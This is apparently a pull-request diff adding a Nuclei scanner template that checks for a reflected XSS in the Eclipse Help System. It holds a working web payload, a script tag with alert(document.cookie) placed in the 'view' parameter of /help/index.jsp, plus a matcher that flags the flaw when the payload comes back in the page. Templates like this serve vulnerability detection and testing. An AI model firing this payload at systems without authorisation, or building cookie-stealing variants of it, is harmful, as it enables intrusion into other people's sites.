Merge pull request #368 from projectdiscovery/eclipse-help-system-xss

Create eclipse-help-system-xss.yaml

vulnerabilities/eclipse-help-system-xss.yaml

@@ -0,0 +1,22 @@
+id: eclipse-help-system-xss
+
+info:
+  name: Eclipse Help System RXSS vulnerability
+  author: pikpikcu
+  severity: medium
+
+  # Source:- https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/eclipse-xss.yaml
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/help/index.jsp?view=<script>alert(document.cookie)</script>"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "<script>alert(document.cookie)</script>"
+        part: body